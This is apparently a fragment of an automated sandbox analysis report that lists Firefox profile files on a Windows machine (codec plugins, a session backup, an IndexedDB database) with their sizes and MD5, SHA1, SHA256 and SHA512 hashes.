SHA25637c005a7789747b412d6c0a6a4c30d15732da3d857b4f94b744be1a67231b651
SHA512eebdeef5e47aeadfeebdbab8625f4ec91e15c4c4e4db4be91ea41be4a3da1e1afeed305f6470e5d6b2a31c41cbfb5548b35a15fccd7896d3fde7cdf402d7a339
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ahkgvp67.default-release\gmp-gmpopenh264\2.6.0\gmpopenh264.info
Filesize116B
MD5ae29912407dfadf0d683982d4fb57293
SHA10542053f5a6ce07dc206f69230109be4a5e25775
SHA256fe7686a6281f0ab519c32c788ce0da0d01640425018dcffcfcb81105757f6fe6
SHA5126f9083152c02f93a900cb69b1ce879e0c0d69453f1046280ca549a0301ae7925facdda6329f7ccb61726addee78ba2fffc5ba3491a185f139f3155716caf0a8d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ahkgvp67.default-release\gmp-widevinecdm\4.10.2891.0\manifest.json
Filesize1001B
MD532aeacedce82bafbcba8d1ade9e88d5a
SHA1a9b4858d2ae0b6595705634fd024f7e076426a24
SHA2564ed3c6389f6f7cd94db5cd0f870c34a296fc0de3b1e707fccf01645b455790ce
SHA51267dfe5632188714ec87f3c79dbe217a0ae4dfb784f3fac63affd20fef8b8ef1978c28b3bf7955f3daaf3004ac5316b1ffa964683b0676841bab4274c325c6e2b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ahkgvp67.default-release\gmp-widevinecdm\4.10.2891.0\widevinecdm.dll
Filesize18.5MB
MD51b32d1ec35a7ead1671efc0782b7edf0
SHA18e3274b9f2938ff2252ed74779dd6322c601a0c8
SHA2563ed0dec36754402707c2ae4fbfa887fe3089945f6f7c1a8a3e6c1e64ad1c2648
SHA512ab452caa2a529b5bf3874c291f1ffb2a30d9ea43dae5df6a6995dde4bc3506648c749317f0d8e94c31214e62f18f855d933b6d0b6b44634b01e058d3c5fcb499
-
Filesize
6KB
MD567b4b039f0448dc42999e438aa4ca9d0
SHA107ba3146e7e41b06e1ce14d357291afda8257cb3
SHA2565586a31e95c38bbb021d486d5a3d0096cf15dfb77e08411ef73dcf26a7b52e13
SHA5120fe0fafac6c9c9f8609d23b9ae43d3239c197609ccc3ae580f85e3d346f92359e464e6836bf295b55886c2f08f4483f44939f94ed5e7fcca633f9686b43c4b13
-
Filesize
8KB
MD5a3b6d9ff25f49a3accc10a3f2795c7fb
SHA14c4dbdad4f2716437c737b265d048b140b3a140b
SHA256ed43b24a0bbbfe38eeefe92d10b545fc3e6c079621b5b7fce0fc4a60b74c9be6
SHA512d4e098b7a2c76b193ebbea0615826fffeb2f50ab5789d70521add38ca167a8162f3ff32b9ed05ee17a1ed4a6db34cde9672b76019f3855629f994bab75630101
-
Filesize
6KB
MD5cb9d2123afb74b65d22692db0425650b
SHA129d5f82b01c043d4d742edaccb6938306824f335
SHA2567d28671fd8b2581d20dcbbb67c9a7cce9a36eee011ee3d3a2968429ca806b366
SHA5126033bb421c4ff7c5e8a0a91c98572beb19a1b66e277f5e5c22d20ab42b4a5530fc0b0b989e726f73eb6ebda212351175aef8a5ab552c76ab2342c78d7d924ef8
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ahkgvp67.default-release\sessionstore-backups\recovery.baklz4
Filesize1KB
MD5d70e5199361be11c9732e3fffc181a31
SHA184d1e9a75f8e460be14f704cebf458121445d7e9
SHA256b603ed8b6ffec93ab950d0f80ca849aa2bccfd9f1b3c7b1e4c22049bd9d4698a
SHA51230fd12c51218627b6e4862c99adaa2042e63bca09a62bef14731e808a98817242fb0c6fa8f8b36d4790b948554296958bd5e61ac0eba32be6bf8b410e44098fc
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ahkgvp67.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize3.3MB
MD513ff017b9ae57822ab8c8051a1484150
SHA1c612975a83136e5deb387a7211e0fdb18e9f3af2
SHA256fcb8a6ed8d391d58264cd1860c142fad03f5ef55d6cac94cf093fca80fb9cd0a
SHA512fb54cae7a3b524f1430ae779b6582c6f1f57669dd52246adf4401f2c3a88fa7be37515716886170d38bda77ab746f2e0f88400181fcce1e79ebf775354f099cd